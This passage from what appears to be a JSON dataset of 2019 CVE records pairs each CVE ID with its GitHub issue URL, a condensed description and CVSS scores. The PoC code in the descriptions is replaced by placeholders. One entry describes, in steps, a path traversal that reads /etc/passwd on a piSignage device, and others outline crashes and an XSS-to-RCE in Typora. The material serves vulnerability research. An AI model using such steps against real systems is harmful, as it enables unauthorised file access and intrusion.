  41722. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/462",
  41723. "Repo_new": "axiomatic-systems/bento4",
  41724. "Issue_Created_At": "2019-12-09T09:00:42Z",
  41725. "description": "2 segv in mp NUMBERTAG ts. ./mp NUMBERTAG ts $poc out poc FILETAG FILETAG asan output NUMBERTAG ERRORTAG NUMBERTAG ERRORTAG",
  41726. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41727. "severity": "MEDIUM",
  41728. "baseScore": 5.5,
  41729. "impactScore": 3.6,
  41730. "exploitabilityScore": 1.8
  41731. },
  41732. {
  41733. "CVE_ID": "CVE-2019-20094",
  41734. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/125",
  41735. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/125",
  41736. "Repo_new": "saitoha/libsixel",
  41737. "Issue_Created_At": "2019-12-25T00:03:38Z",
  41738. "description": "heap overflow in APITAG img2sixel I $POC FILETAG asan output ERRORTAG",
  41739. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41740. "severity": "HIGH",
  41741. "baseScore": 8.8,
  41742. "impactScore": 5.9,
  41743. "exploitabilityScore": 2.8
  41744. },
  41745. {
  41746. "CVE_ID": "CVE-2019-20140",
  41747. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/122",
  41748. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/122",
  41749. "Repo_new": "saitoha/libsixel",
  41750. "Issue_Created_At": "2019-12-22T13:23:47Z",
  41751. "description": "heap buffer overflow in gif_out_code at APITAG version : img2sixel NUMBERTAG OS : Ubuntu NUMBERTAG configured with: libcurl: yes libpng: yes libjpeg: yes gdk pixbuf2: no GD: no There is a heap buffer overflow in gif_out_code at APITAG please run following cmd to reproduce it. APITAG poc URLTAG ASAN LOG ERRORTAG",
  41752. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41753. "severity": "HIGH",
  41754. "baseScore": 8.8,
  41755. "impactScore": 5.9,
  41756. "exploitabilityScore": 2.8
  41757. },
  41758. {
  41759. "CVE_ID": "CVE-2019-20149",
  41760. "Issue_Url_old": "https://github.com/jonschlinkert/kind-of/issues/30",
  41761. "Issue_Url_new": "https://github.com/jonschlinkert/kind-of/issues/30",
  41762. "Repo_new": "jonschlinkert/kind-of",
  41763. "Issue_Created_At": "2019-12-16T01:04:23Z",
  41764. "description": "A vulnerability in APITAG We found that a maliciously crafted user input object can manipulate the type-checking result of the kind-of module. The vulnerability is from the following code: kind of leverages the built in constructor of unsafe user input to detect type information. However, a crafted payload can overwrite this builtin attribute to manipulate the type detection result. URLTAG Reproduce Script CODETAG This issue can be fixed by adding one simple check to the APITAG function: check ERRORTAG . This check can patch the vulnerability because attackers can't use json to send function instances to the victim server.",
  41765. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  41766. "severity": "HIGH",
  41767. "baseScore": 7.5,
  41768. "impactScore": 3.6,
  41769. "exploitabilityScore": 3.9
  41770. },
  41771. {
  41772. "CVE_ID": "CVE-2019-20159",
  41773. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1321",
  41774. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1321",
  41775. "Repo_new": "gpac/gpac",
  41776. "Issue_Created_At": "2019-10-28T16:03:11Z",
  41777. "description": "APITAG NUMBERTAG memory leaks of APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (master NUMBERTAG ada NUMBERTAG e) Compile Command: APITAG Run Command: APITAG POC file: URLTAG ASAN info: ERRORTAG",
  41778. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41779. "severity": "MEDIUM",
  41780. "baseScore": 5.5,
  41781. "impactScore": 3.6,
  41782. "exploitabilityScore": 1.8
  41783. },
  41784. {
  41785. "CVE_ID": "CVE-2019-20160",
  41786. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1334",
  41787. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1334",
  41788. "Repo_new": "gpac/gpac",
  41789. "Issue_Created_At": "2019-11-09T11:22:06Z",
  41790. "description": "APITAG stack buffer overflow in a NUMBERTAG parse_tile_group APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
  41791. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41792. "severity": "MEDIUM",
  41793. "baseScore": 5.5,
  41794. "impactScore": 3.6,
  41795. "exploitabilityScore": 1.8
  41796. },
  41797. {
  41798. "CVE_ID": "CVE-2019-20161",
  41799. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1320",
  41800. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1320",
  41801. "Repo_new": "gpac/gpac",
  41802. "Issue_Created_At": "2019-10-28T15:50:52Z",
  41803. "description": "APITAG heap buffer overflow in APITAG at APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (master NUMBERTAG ada NUMBERTAG e) Compile Command: APITAG Run Command: APITAG POC file: URLTAG ASAN info: ERRORTAG gdb info: ERRORTAG",
  41804. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41805. "severity": "MEDIUM",
  41806. "baseScore": 5.5,
  41807. "impactScore": 3.6,
  41808. "exploitabilityScore": 1.8
  41809. },
  41810. {
  41811. "CVE_ID": "CVE-2019-20162",
  41812. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1327",
  41813. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1327",
  41814. "Repo_new": "gpac/gpac",
  41815. "Issue_Created_At": "2019-11-09T11:12:14Z",
  41816. "description": "ERROR: APITAG heap buffer overflow in gf_isom_box_parse_ex APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG URLTAG For POC new gf_isom_box_parse_ex gdb info: CODETAG For POC new gf_isom_box_parse_e NUMBERTAG gdb info: CODETAG For POC new gf_isom_box_parse_ex ASAN info: ERRORTAG For POC new gf_isom_box_parse_e NUMBERTAG ERRORTAG",
  41817. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41818. "severity": "MEDIUM",
  41819. "baseScore": 5.5,
  41820. "impactScore": 3.6,
  41821. "exploitabilityScore": 1.8
  41822. },
  41823. {
  41824. "CVE_ID": "CVE-2019-20163",
  41825. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1335",
  41826. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1335",
  41827. "Repo_new": "gpac/gpac",
  41828. "Issue_Created_At": "2019-11-09T11:23:01Z",
  41829. "description": "APITAG SEGV in gf_odf_avc_cfg_write_bs APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
  41830. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41831. "severity": "MEDIUM",
  41832. "baseScore": 5.5,
  41833. "impactScore": 3.6,
  41834. "exploitabilityScore": 1.8
  41835. },
  41836. {
  41837. "CVE_ID": "CVE-2019-20164",
  41838. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1332",
  41839. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1332",
  41840. "Repo_new": "gpac/gpac",
  41841. "Issue_Created_At": "2019-11-09T11:19:52Z",
  41842. "description": "APITAG SEGV in gf_isom_box_del APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: ERRORTAG ASAN info: ERRORTAG",
  41843. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41844. "severity": "MEDIUM",
  41845. "baseScore": 5.5,
  41846. "impactScore": 3.6,
  41847. "exploitabilityScore": 1.8
  41848. },
  41849. {
  41850. "CVE_ID": "CVE-2019-20165",
  41851. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1338",
  41852. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1338",
  41853. "Repo_new": "gpac/gpac",
  41854. "Issue_Created_At": "2019-11-09T12:06:24Z",
  41855. "description": "ERROR: APITAG SEGV in APITAG APITAG Hello, I found a similar issue but I am not sure they are the same. URLTAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
  41856. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41857. "severity": "MEDIUM",
  41858. "baseScore": 5.5,
  41859. "impactScore": 3.6,
  41860. "exploitabilityScore": 1.8
  41861. },
  41862. {
  41863. "CVE_ID": "CVE-2019-20166",
  41864. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1331",
  41865. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1331",
  41866. "Repo_new": "gpac/gpac",
  41867. "Issue_Created_At": "2019-11-09T11:18:44Z",
  41868. "description": "APITAG SEGV in gf_isom_dump APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: ERRORTAG ASAN info: ERRORTAG",
  41869. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41870. "severity": "MEDIUM",
  41871. "baseScore": 5.5,
  41872. "impactScore": 3.6,
  41873. "exploitabilityScore": 1.8
  41874. },
  41875. {
  41876. "CVE_ID": "CVE-2019-20167",
  41877. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1330",
  41878. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1330",
  41879. "Repo_new": "gpac/gpac",
  41880. "Issue_Created_At": "2019-11-09T11:17:12Z",
  41881. "description": "APITAG SEGV in APITAG APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
  41882. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41883. "severity": "MEDIUM",
  41884. "baseScore": 5.5,
  41885. "impactScore": 3.6,
  41886. "exploitabilityScore": 1.8
  41887. },
  41888. {
  41889. "CVE_ID": "CVE-2019-20168",
  41890. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1333",
  41891. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1333",
  41892. "Repo_new": "gpac/gpac",
  41893. "Issue_Created_At": "2019-11-09T11:21:05Z",
  41894. "description": "APITAG heap use after free in gf_isom_box_dump_ex APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
  41895. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41896. "severity": "MEDIUM",
  41897. "baseScore": 5.5,
  41898. "impactScore": 3.6,
  41899. "exploitabilityScore": 1.8
  41900. },
  41901. {
  41902. "CVE_ID": "CVE-2019-20169",
  41903. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1329",
  41904. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1329",
  41905. "Repo_new": "gpac/gpac",
  41906. "Issue_Created_At": "2019-11-09T11:15:44Z",
  41907. "description": "APITAG heap use after free in APITAG APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
  41908. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41909. "severity": "MEDIUM",
  41910. "baseScore": 5.5,
  41911. "impactScore": 3.6,
  41912. "exploitabilityScore": 1.8
  41913. },
  41914. {
  41915. "CVE_ID": "CVE-2019-20170",
  41916. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1328",
  41917. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1328",
  41918. "Repo_new": "gpac/gpac",
  41919. "Issue_Created_At": "2019-11-09T11:14:15Z",
  41920. "description": "APITAG SEGV in APITAG APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
  41921. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41922. "severity": "MEDIUM",
  41923. "baseScore": 5.5,
  41924. "impactScore": 3.6,
  41925. "exploitabilityScore": 1.8
  41926. },
  41927. {
  41928. "CVE_ID": "CVE-2019-20171",
  41929. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1337",
  41930. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1337",
  41931. "Repo_new": "gpac/gpac",
  41932. "Issue_Created_At": "2019-11-09T12:00:28Z",
  41933. "description": "APITAG NUMBERTAG memory leaks of APITAG APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: ERRORTAG ASAN info: ERRORTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s).",
  41934. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41935. "severity": "MEDIUM",
  41936. "baseScore": 5.5,
  41937. "impactScore": 3.6,
  41938. "exploitabilityScore": 1.8
  41939. },
  41940. {
  41941. "CVE_ID": "CVE-2019-20205",
  41942. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/127",
  41943. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/127",
  41944. "Repo_new": "saitoha/libsixel",
  41945. "Issue_Created_At": "2019-12-31T08:03:38Z",
  41946. "description": "integer overflow in sixel_frame_resize in frame.c. In function APITAG , width and height can be specified by user. Line NUMBERTAG has an integer overflow. If width and height are very large numbers, allocation will fail. FILETAG poc: FILETAG result: ERRORTAG",
  41947. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41948. "severity": "HIGH",
  41949. "baseScore": 8.8,
  41950. "impactScore": 5.9,
  41951. "exploitabilityScore": 2.8
  41952. },
  41953. {
  41954. "CVE_ID": "CVE-2019-20208",
  41955. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1348",
  41956. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1348",
  41957. "Repo_new": "gpac/gpac",
  41958. "Issue_Created_At": "2019-11-13T07:25:13Z",
  41959. "description": "There is a stack buffer overflow in the APITAG function of APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! \u221a] I looked for a similar issue and couldn't find any. [ \u221a] I tried with the latest version of GPAC. Installers available at URLTAG [ \u221a] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG A crafted input will lead to crash in box_code NUMBERTAG gpp.c at gpac NUMBERTAG Triggered by APITAG diso POC out /dev/null Poc NUMBERTAG stack APITAG URLTAG The ASAN information is as follows: ERRORTAG",
  41960. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41961. "severity": "MEDIUM",
  41962. "baseScore": 5.5,
  41963. "impactScore": 3.6,
  41964. "exploitabilityScore": 1.8
  41965. },
  41966. {
  41967. "CVE_ID": "CVE-2019-20219",
  41968. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/15",
  41969. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/15",
  41970. "Repo_new": "miniupnp/ngiflib",
  41971. "Issue_Created_At": "2019-10-14T09:40:20Z",
  41972. "description": "heap buffer overflow at APITAG in APITAG Tested in Ubuntu NUMBERTAG bit, ngiflib(master NUMBERTAG bef2a0) Triggered by gif2tga $POC POC file: FILETAG asan ERRORTAG",
  41973. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41974. "severity": "HIGH",
  41975. "baseScore": 8.8,
  41976. "impactScore": 5.9,
  41977. "exploitabilityScore": 2.8
  41978. },
  41979. {
  41980. "CVE_ID": "CVE-2019-20329",
  41981. "Issue_Url_old": "https://github.com/open-lambda/open-lambda/issues/92",
  41982. "Issue_Url_new": "https://github.com/open-lambda/open-lambda/issues/92",
  41983. "Repo_new": "open-lambda/open-lambda",
  41984. "Issue_Created_At": "2019-12-16T06:22:47Z",
  41985. "description": "OL Server vulnerable to DNS Rebinding attacks. The REST API spawned on port NUMBERTAG isn't validating the Host header; as such, the server is vulnerable to DNS Rebinding attacks. Impact : By tricking users into visiting a website, it will be possible to perform all REST calls on behalf of the user from the attacker's website, bypassing the same origin policy using DNS rebinding. Few actions are calling functions",
  41986. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
  41987. "severity": "HIGH",
  41988. "baseScore": 8.1,
  41989. "impactScore": 5.2,
  41990. "exploitabilityScore": 2.8
  41991. },
  41992. {
  41993. "CVE_ID": "CVE-2019-20330",
  41994. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2526",
  41995. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2526",
  41996. "Repo_new": "fasterxml/jackson-databind",
  41997. "Issue_Created_At": "2019-10-25T20:55:07Z",
  41998. "description": "Block two more gadget types (JNDI CVEs to be allocated). Another NUMBERTAG gadget ( ) types reported related to JNDI access. See URLTAG for description of the general problem. Mitre id: Mitre id: Original discoverer: APITAG Planned to be fixed in: not yet NUMBERTAG backported in NUMBERTAG branch (no release yet)",
  41999. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42000. "severity": "CRITICAL",
  42001. "baseScore": 9.8,
  42002. "impactScore": 5.9,
  42003. "exploitabilityScore": 3.9
  42004. },
  42005. {
  42006. "CVE_ID": "CVE-2019-20354",
  42007. "Issue_Url_old": "https://github.com/colloqi/piSignage/issues/97",
  42008. "Issue_Url_new": "https://github.com/colloqi/pisignage/issues/97",
  42009. "Repo_new": "colloqi/pisignage",
  42010. "Issue_Created_At": "2019-11-13T02:19:31Z",
  42011. "description": "Path Traversal vulnerability. Describe the bug Suggested description of the vulnerability : A path traversal vulnerability in the web application component of APITAG NUMBERTAG allows a remote attacker authenticated as a low privilege user to download arbitrary files from the Raspberry Pi. Attack vector(s) FILETAG NUMBERTAG Click the Log Download button at the bottom of the APITAG administration page. FILETAG NUMBERTAG HTTP Packet is sent when the button is pressed. FILETAG NUMBERTAG Change the value of 'file' parameter to APITAG . FILETAG NUMBERTAG You can see that the /etc/passwd file is read. Affected URL/API(s) URL: APITAG Parameter: file Environment Raspberry Pi Hardware Version: Model NUMBERTAG B+ Revision NUMBERTAG Ram NUMBERTAG GB Sony UK APITAG Version: APITAG",
  42012. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  42013. "severity": "MEDIUM",
  42014. "baseScore": 4.3,
  42015. "impactScore": 1.4,
  42016. "exploitabilityScore": 2.8
  42017. },
  42018. {
  42019. "CVE_ID": "CVE-2019-20374",
  42020. "Issue_Url_old": "https://github.com/typora/typora-issues/issues/3124",
  42021. "Issue_Url_new": "https://github.com/typora/typora-issues/issues/3124",
  42022. "Repo_new": "typora/typora-issues",
  42023. "Issue_Created_At": "2019-12-27T22:37:51Z",
  42024. "description": "Typora RCE via mXSS. Summary A mXSS in Typora leads to remote code execution. The vector is Mermaid code blocks (HTML labels) however other spots where Typora attempts to clean up HTML using APITAG could be prone to the same. Steps to reproduce / APITAG NUMBERTAG Create an .md with the following contents: ~~~ CODETAG NUMBERTAG Open the file in Typora NUMBERTAG Witness a calculator pop up: FILETAG The payload is simply HTML entity encoded ERRORTAG where the JS is simply: CODETAG Fix It's perhaps best to upgrade APITAG URLTAG to the latest version URLTAG which seems to address new mutation XSS vectors. It looks like the version that's shipped with Typora is somewhat old NUMBERTAG Consider employing Content Security Policy URLTAG for a broader mitigation. It appears that RCE via XSS emerges as a pattern among Typora's issues. Implementing a fine tuned CSP is time consuming but building a good policy step by step could prove worthy in the long run and cover users even when new XSS vectors are discovered. Notes Versions known to be vulnerable and tested are NUMBERTAG These are the latest downloads from the website (for Linux and APITAG respectively). I did not test the Windows version of the app. CVSS NUMBERTAG My take is FILETAG",
  42025. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  42026. "severity": "CRITICAL",
  42027. "baseScore": 9.6,
  42028. "impactScore": 6.0,
  42029. "exploitabilityScore": 2.8
  42030. },
  42031. {
  42032. "CVE_ID": "CVE-2019-20377",
  42033. "Issue_Url_old": "https://github.com/tophubs/TopList/issues/32",
  42034. "Issue_Url_new": "https://github.com/tophubs/toplist/issues/32",
  42035. "Repo_new": "tophubs/toplist",
  42036. "Issue_Created_At": "2019-09-03T08:37:33Z",
  42037. "description": "There is a Cross Site Scripting (XSS) Vulnerability. I noticed an odd title when I visited your website",
  42038. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  42039. "severity": "MEDIUM",
  42040. "baseScore": 6.1,
  42041. "impactScore": 2.7,
  42042. "exploitabilityScore": 2.8
  42043. },
  42044. {
  42045. "CVE_ID": "CVE-2019-20378",
  42046. "Issue_Url_old": "https://github.com/ganglia/ganglia-web/issues/351",
  42047. "Issue_Url_new": "https://github.com/ganglia/ganglia-web/issues/351",
  42048. "Repo_new": "ganglia/ganglia-web",
  42049. "Issue_Created_At": "2019-12-17T01:38:44Z",
  42050. "description": "Two XSS issue found in.",
  42051. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  42052. "severity": "MEDIUM",
  42053. "baseScore": 6.1,
  42054. "impactScore": 2.7,
  42055. "exploitabilityScore": 2.8
  42056. },
  42057. {
  42058. "CVE_ID": "CVE-2019-20391",
  42059. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/772",
  42060. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/772",
  42061. "Repo_new": "cesnet/libyang",
  42062. "Issue_Created_At": "2019-04-26T17:01:20Z",
  42063. "description": "Segmentation fault in yangfuzz and yanglint. Hi, here is another file that crashes yangfuzz and yanglint. ERRORTAG Regards",
  42064. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42065. "severity": "MEDIUM",
  42066. "baseScore": 6.5,
  42067. "impactScore": 3.6,
  42068. "exploitabilityScore": 2.8
  42069. },
  42070. {
  42071. "CVE_ID": "CVE-2019-20392",
  42072. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/723",
  42073. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/723",
  42074. "Repo_new": "cesnet/libyang",
  42075. "Issue_Created_At": "2019-03-07T19:25:40Z",
  42076. "description": "Segmentation fault when if feature is used in list key node, with a non existing feature. If an if feature statement is used inside a list key node, and the feature used is not defined, yanglint and yangfuzz segfault in lys_parse_path. Here is an example of a yang file that crashes the parser: CODETAG",
  42077. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42078. "severity": "MEDIUM",
  42079. "baseScore": 6.5,
  42080. "impactScore": 3.6,
  42081. "exploitabilityScore": 2.8
  42082. },
  42083. {
  42084. "CVE_ID": "CVE-2019-20393",
  42085. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/742",
  42086. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/742",
  42087. "Repo_new": "cesnet/libyang",
  42088. "Issue_Created_At": "2019-03-29T11:16:03Z",
  42089. "description": "Heap corruption in yyparse. Hi, this file crashes lys_parse_path: CODETAG",
  42090. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  42091. "severity": "HIGH",
  42092. "baseScore": 8.8,
  42093. "impactScore": 5.9,
  42094. "exploitabilityScore": 2.8
  42095. },
  42096. {
  42097. "CVE_ID": "CVE-2019-20394",
  42098. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/769",
  42099. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/769",
  42100. "Repo_new": "cesnet/libyang",
  42101. "Issue_Created_At": "2019-04-26T09:14:19Z",
  42102. "description": "Heap corruption in lys_parse_path due to type statement in notification statement. Hi, this file causes heap corruption and crashes lys_parse_path CODETAG",
  42103. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  42104. "severity": "HIGH",
  42105. "baseScore": 8.8,
  42106. "impactScore": 5.9,
  42107. "exploitabilityScore": 2.8
  42108. },
  42109. {
  42110. "CVE_ID": "CVE-2019-20395",
  42111. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/724",
  42112. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/724",
  42113. "Repo_new": "cesnet/libyang",
  42114. "Issue_Created_At": "2019-03-08T10:26:25Z",
  42115. "description": "Segmentation fault due to self-referential union type containing leafrefs. Hi, the following yang file causes a segmentation fault in lys_parse_path, caused by a stack overflow from unbounded recursion. ERRORTAG The issue seems to be caused by the self-referential union type containing a leafref. If the list5 leaf list is removed, the issue persists, but the stack overflow takes longer to appear. A gdb backtrace shows that the call stack is full of lys_copy_union_leafrefs calls, called in APITAG and APITAG Regards, Juraj",
  42116. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42117. "severity": "MEDIUM",
  42118. "baseScore": 6.5,
  42119. "impactScore": 3.6,
  42120. "exploitabilityScore": 2.8
  42121. },
  42122. {
  42123. "CVE_ID": "CVE-2019-20396",
  42124. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/740",
  42125. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/740",
  42126. "Repo_new": "cesnet/libyang",
  42127. "Issue_Created_At": "2019-03-29T10:38:30Z",
  42128. "description": "Segmentation fault in yyparse due to malformed pattern statement value. Hello, this file crashes libyang when it is parsed with lys_parse_path: CODETAG Regards, Juraj",
  42129. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42130. "severity": "MEDIUM",
  42131. "baseScore": 6.5,
  42132. "impactScore": 3.6,
  42133. "exploitabilityScore": 2.8
  42134. },
  42135. {
  42136. "CVE_ID": "CVE-2019-20397",
  42137. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/739",
  42138. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/739",
  42139. "Repo_new": "cesnet/libyang",
  42140. "Issue_Created_At": "2019-03-28T09:31:50Z",
  42141. "description": "Heap corruption due to invalid unterminated organization field in YANG file. Hello, this file crashes lys_parse_path: CODETAG Regards, Juraj",
  42142. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  42143. "severity": "HIGH",
  42144. "baseScore": 8.8,
  42145. "impactScore": 5.9,
  42146. "exploitabilityScore": 2.8
  42147. },
  42148. {
  42149. "CVE_ID": "CVE-2019-20398",
  42150. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/773",
  42151. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/773",
  42152. "Repo_new": "cesnet/libyang",
  42153. "Issue_Created_At": "2019-04-29T13:21:12Z",
  42154. "description": "Segmentation fault in yanglint and yangfuzz due to unprintable characters. Hi, this file crashes due to unprintable characters at the end of the file. Shortening the error message string removes the crash too, so I guess both issues are relevant. ERRORTAG Here is the file base NUMBERTAG encoded: CODETAG I've encoded the file with b NUMBERTAG rather than using the xxd output, since I assume decoding b NUMBERTAG is somewhat easier than creating the file from xxd. If you would prefer another format for files containing binary data, please let me know.",
  42155. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42156. "severity": "MEDIUM",
  42157. "baseScore": 6.5,
  42158. "impactScore": 3.6,
  42159. "exploitabilityScore": 2.8
  42160. },
  42161. {
  42162. "CVE_ID": "CVE-2019-20421",
  42163. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/1011",
  42164. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/1011",
  42165. "Repo_new": "exiv2/exiv2",
  42166. "Issue_Created_At": "2019-09-30T12:02:01Z",
